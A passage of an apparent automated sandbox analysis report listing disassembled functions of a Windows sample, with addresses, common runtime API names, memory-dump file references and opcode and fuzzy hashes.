                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: _get_daylight$_isindst
                                                    • String ID:
                                                    • API String ID: 4170891091-0
                                                    • Opcode ID: a806384fd3dbc637569f566945d79e9d0f9a49a7dde5cce1babac435a7d8ed95
                                                    • Instruction ID: 0825c4f3f0380bb8c4bc96f0df7f598ff4becd9e4f9def89b51c03c145496a32
                                                    • Opcode Fuzzy Hash: a806384fd3dbc637569f566945d79e9d0f9a49a7dde5cce1babac435a7d8ed95
                                                    • Instruction Fuzzy Hash: 95512872F052324AEB24CF24ED416BD27A1AB5035DF59413DED1EB2AE9DF7CA4428700
                                                    Function 00007FF652EE5EF0 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 1279662727-0
                                                    • Opcode ID: 2e3e6935fd272a0e473f5669fe72b613a847a441e18d85c9910f5be84e911a30
                                                    • Instruction ID: 1ea6041d9587343c3f5255c8e652f04261a71fe929dbb5d2934588ca1980f9af
                                                    • Opcode Fuzzy Hash: 2e3e6935fd272a0e473f5669fe72b613a847a441e18d85c9910f5be84e911a30
                                                    • Instruction Fuzzy Hash: E441D422D187A383E750CB219D103B96360FF95368F189338E69CA3AD5DFBCA5E58701
                                                    Function 00007FF652EDC3CC Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                    • String ID:
                                                    • API String ID: 3251591375-0
                                                    • Opcode ID: 9d2a249925c3744b7bdec991b642967cea5aa1e4eae3f82ffa02bbb969e0fbb5
                                                    • Instruction ID: 991e5e70f4f4c0e18e2962765fd7a0526e6b88d7c3def2a66d577b323ecbf0c6
                                                    • Opcode Fuzzy Hash: 9d2a249925c3744b7bdec991b642967cea5aa1e4eae3f82ffa02bbb969e0fbb5
                                                    • Instruction Fuzzy Hash: 1A310C12E5822341FB14AB64AC523B922919FC17CCF8C603DEA4EFB2D7DEECB4458251
                                                    Function 00007FF652EEA7E4 Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Process$CurrentExitTerminate
                                                    • String ID:
                                                    • API String ID: 1703294689-0
                                                    • Opcode ID: a9ca9fd944998b9103efb0079ab816177775b60747cbceda43ee2d2e97830e0f
                                                    • Instruction ID: f96b8681641c6347cf629e15b364e3039981c5c1666de6f8896f93004dc110fb
                                                    • Opcode Fuzzy Hash: a9ca9fd944998b9103efb0079ab816177775b60747cbceda43ee2d2e97830e0f
                                                    • Instruction Fuzzy Hash: 94D09E11F1872342FA146B706C9A07A12115F58B49F18647CC81FB6397CDBCA44E8289
                                                    Function 00007FF652ED8D80 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: CreateDirectoryMessage
                                                    • String ID: Security descriptor is not initialized!
                                                    • API String ID: 73271072-986317556
                                                    • Opcode ID: cb4d7abd45f9f406bb8e9fa743bd3ea339ce9ab77a45f8f760c2574a3479da4c
                                                    • Instruction ID: 07d3d537e5cb3390e9737d96659b7cf687a1b5636642f9577473cd460d7c45d5
                                                    • Opcode Fuzzy Hash: cb4d7abd45f9f406bb8e9fa743bd3ea339ce9ab77a45f8f760c2574a3479da4c
                                                    • Instruction Fuzzy Hash: 61E092B2A5874682EA509B24FC0526923A0FBA1358FD8133CE54CE73E4DFBCD1598B00
                                                    Function 00007FF652EE0A6C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: cf177395047abfa4e851662a110b86e3e3c378c626585af56caf23d5c147307d
                                                    • Instruction ID: d49d917d8b143eebed1e910014831b7035b532e038115b222fc3940aa5bde812
                                                    • Opcode Fuzzy Hash: cf177395047abfa4e851662a110b86e3e3c378c626585af56caf23d5c147307d
                                                    • Instruction Fuzzy Hash: 5C510621B0926747EA6A9E25DC006BA6291BF44BACF1C473CDD6DB77C5DEBCE4058600
                                                    Function 00007FF652EECEE4 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastPointer
                                                    • String ID:
                                                    • API String ID: 2976181284-0
                                                    • Opcode ID: 5a688e03e61d2ba522e05303caa220c229835d3c67e189c94220df843fa187e3
                                                    • Instruction ID: a4842befb3767b977b887cb59cc8246e83cd831040a1f95da28daa4c8ab44721
                                                    • Opcode Fuzzy Hash: 5a688e03e61d2ba522e05303caa220c229835d3c67e189c94220df843fa187e3
                                                    • Instruction Fuzzy Hash: 3C11B262618AA281DA108B26F80406973A1AB44BF8F585339EA7DA77E9CFBCD0558700
                                                    Function 00007FF652EE88E0 Relevance: 3.0, APIs: 2, Instructions: 35timeCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF652EE875D), ref: 00007FF652EE8903
                                                    • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF652EE875D), ref: 00007FF652EE8919
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Time$System$FileLocalSpecific
                                                    • String ID:
                                                    • API String ID: 1707611234-0
                                                    • Opcode ID: f486ed6e5c3c2cbaa4962bae20fc4c636bf07173bccdb3ad29f0a9c75d11b156
                                                    • Instruction ID: d226e023c1c10ddf90df010b52b53cba4ca9ad6d398bdd3123fd4e9f66a3c2c9
                                                    • Opcode Fuzzy Hash: f486ed6e5c3c2cbaa4962bae20fc4c636bf07173bccdb3ad29f0a9c75d11b156
                                                    • Instruction Fuzzy Hash: B501A53291C66282E7609F14F80523AB3B1FB81B69F64433AE7AD915E8DFBDD004DB10
                                                    Function 00007FF652EEB700 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • RtlFreeHeap.NTDLL(?,?,?,00007FF652EF3B72,?,?,?,00007FF652EF3BAF,?,?,00000000,00007FF652EF4075,?,?,00000000,00007FF652EF3FA7), ref: 00007FF652EEB716
                                                    • GetLastError.KERNEL32(?,?,?,00007FF652EF3B72,?,?,?,00007FF652EF3BAF,?,?,00000000,00007FF652EF4075,?,?,00000000,00007FF652EF3FA7), ref: 00007FF652EEB720
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 485612231-0
                                                    • Opcode ID: c0904582055235206b637bb6fb630becad907d152bf6a94a3ba36ee294329771
                                                    • Instruction ID: e53607224b42e3599c3cb732b2a3c75d0cd128cbaef37e03f1b0a0d00d114692
                                                    • Opcode Fuzzy Hash: c0904582055235206b637bb6fb630becad907d152bf6a94a3ba36ee294329771
                                                    • Instruction Fuzzy Hash: 12E0C251F0D22342FF18ABF2ACE547912515F88B58F5C153CC90DFB391EEACA89A8200
                                                    Function 00007FF652EE8ECC Relevance: 3.0, APIs: 2, Instructions: 12fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: DeleteErrorFileLast
                                                    • String ID:
                                                    • API String ID: 2018770650-0
                                                    • Opcode ID: b1319888d58344e1d146038dbe51c945b0a95c66f9246088a0a26429922302e0
                                                    • Instruction ID: 46a3489ce3a848b5f525f0aa081eaa1ffae8be36dfd6149e2e51aefe94cc5a88
                                                    • Opcode Fuzzy Hash: b1319888d58344e1d146038dbe51c945b0a95c66f9246088a0a26429922302e0
                                                    • Instruction Fuzzy Hash: 47D01214F3892381F614B7F15C8507911946F4572CF681B3CC02DF12F0DEDCA08A5101
                                                    Function 00007FF652EE8648 Relevance: 3.0, APIs: 2, Instructions: 12COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: DirectoryErrorLastRemove
                                                    • String ID:
                                                    • API String ID: 377330604-0
                                                    • Opcode ID: 37b4a7e4d00d01a0eafeac234b577e395ecf372998b901b949fd5718f631df3e
                                                    • Instruction ID: e2121ec0ca674ff9b67edbf703efa8b69fdc28aafa13397f07dc41d016b29e70
                                                    • Opcode Fuzzy Hash: 37b4a7e4d00d01a0eafeac234b577e395ecf372998b901b949fd5718f631df3e
                                                    • Instruction Fuzzy Hash: E8D01254F2996385F61467B56C4547911906F84B3DF681A3CC01DF12E0DEECA04A5502
                                                    Function 00007FF652EEB910 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseHandle.KERNELBASE(?,?,?,00007FF652EEB78D,?,?,00000000,00007FF652EEB842), ref: 00007FF652EEB97E
                                                    • GetLastError.KERNEL32(?,?,?,00007FF652EEB78D,?,?,00000000,00007FF652EEB842), ref: 00007FF652EEB988
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: CloseErrorHandleLast
                                                    • String ID:
                                                    • API String ID: 918212764-0
                                                    • Opcode ID: 3fd0f83af0628cda6e58ba1b17cfc613668cd8d43ebee099ac9aff2e4f27651a
                                                    • Instruction ID: 28f0ac4c376f229a03286a7bc89f10f68640514ff01280227a2413ca346aab0c
                                                    • Opcode Fuzzy Hash: 3fd0f83af0628cda6e58ba1b17cfc613668cd8d43ebee099ac9aff2e4f27651a
                                                    • Instruction Fuzzy Hash: 7821C651B0866341EE949725AD9027D12816F54BACF5C433DDA6EE73E6CEECE4498300
                                                    Function 00007FF652ED7F50 Relevance: 1.6, APIs: 1, Instructions: 141COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00007FF652ED8DE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF652ED2A9B), ref: 00007FF652ED8E1A
                                                    • _findclose.LIBCMT ref: 00007FF652ED81A9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide_findclose
                                                    • String ID:
                                                    • API String ID: 2772937645-0
                                                    • Opcode ID: aa2a36deec39c3a11ec2b62d31fe43dc86d3decf01d493f1b5c8a3539a39b282
                                                    • Instruction ID: aad88034ef91da5904e063cab434b1222a8983d6fd188869fe2f6e23c24f4ef7
                                                    • Opcode Fuzzy Hash: aa2a36deec39c3a11ec2b62d31fe43dc86d3decf01d493f1b5c8a3539a39b282
                                                    • Instruction Fuzzy Hash: 97718D52E18BC581E711CB2CD9052FD6360F7A9B4CF58E329DB9C62592EF68E2D9C700
                                                    Function 00007FF652EECC5C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: 23588c1d4a76148e9b0b46970dab15bc80394bd809d2a1daf00a983cf625f788
                                                    • Instruction ID: 243ea384a212898d57d30a308eb7ef233149a68757f13768cf81fcda4dfbf3b2
                                                    • Opcode Fuzzy Hash: 23588c1d4a76148e9b0b46970dab15bc80394bd809d2a1daf00a983cf625f788
                                                    • Instruction Fuzzy Hash: 9941E73390921387EA64DB25E94017D77A0FF56B48F182239D69EE36A0CFADE402C751
                                                    Function 00007FF652ED85F0 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: DirectoryErrorLastRemove
                                                    • String ID:
                                                    • API String ID: 377330604-0
                                                    • Opcode ID: 9b68c8e0b8cd10c838e6d7f4f4b55f470fe5ed83debbdf123e575bf7c203fc29
                                                    • Instruction ID: ba0b23136f3a374e25ed023c6ca8ae096b3e6c78b47ed3732c8e5a6b8f170ded
                                                    • Opcode Fuzzy Hash: 9b68c8e0b8cd10c838e6d7f4f4b55f470fe5ed83debbdf123e575bf7c203fc29
                                                    • Instruction Fuzzy Hash: AC41A416D1C69681E711DB24D9013FD6360FBE5B88F48A63ADF8DA3193EF68A5D9C300
                                                    Function 00007FF652ED84C0 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: _fread_nolock
                                                    • String ID:
                                                    • API String ID: 840049012-0
                                                    • Opcode ID: 6d3c7b181ef6f9ff6db6d645a81eef8910887d163046eb46ef411d48f89b68c2
                                                    • Instruction ID: d32d6b0d90a515b212c153fc4c22aad87d9aab4309ffc6113103b7021f5dd251
                                                    • Opcode Fuzzy Hash: 6d3c7b181ef6f9ff6db6d645a81eef8910887d163046eb46ef411d48f89b68c2
                                                    • Instruction Fuzzy Hash: 02218521B096B245FB50DB126D047FAA652BF85BD8F8C543CDE0DA7786DEBDE442C600
                                                    Function 00007FF652EEC6EC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: 9d46e4dc1c7706e1baa247f93764384ede75e9bcf433252d370e5f4900f7c3d5
                                                    • Instruction ID: 2b2ebd798dbb89b457d88581682eca930bc7527121fd6411ca4768b1193df061
                                                    • Opcode Fuzzy Hash: 9d46e4dc1c7706e1baa247f93764384ede75e9bcf433252d370e5f4900f7c3d5
                                                    • Instruction Fuzzy Hash: 5631F563E0866381F7059B258C423BC2A50AF40B99F49163DDA1DB73D2DFFCE4428351
                                                    Function 00007FF652EEA715 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: HandleModule$AddressFreeLibraryProc
                                                    • String ID:
                                                    • API String ID: 3947729631-0
                                                    • Opcode ID: 9c0127de50016242ddc74074b6af7f5d0c7ecdfc40d630aae62ff1a96a90ed2f
                                                    • Instruction ID: f912d64fb96f8294a91f8ae072cd009d6cb68d96fa19963b04a3d263bfa91cd0
                                                    • Opcode Fuzzy Hash: 9c0127de50016242ddc74074b6af7f5d0c7ecdfc40d630aae62ff1a96a90ed2f
                                                    • Instruction Fuzzy Hash: 34217136A04A2689EB14CF64C8566AC37B0EB4471CF58063DD61D96BD5DFB8D485C780
                                                    Function 00007FF652EE69E4 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
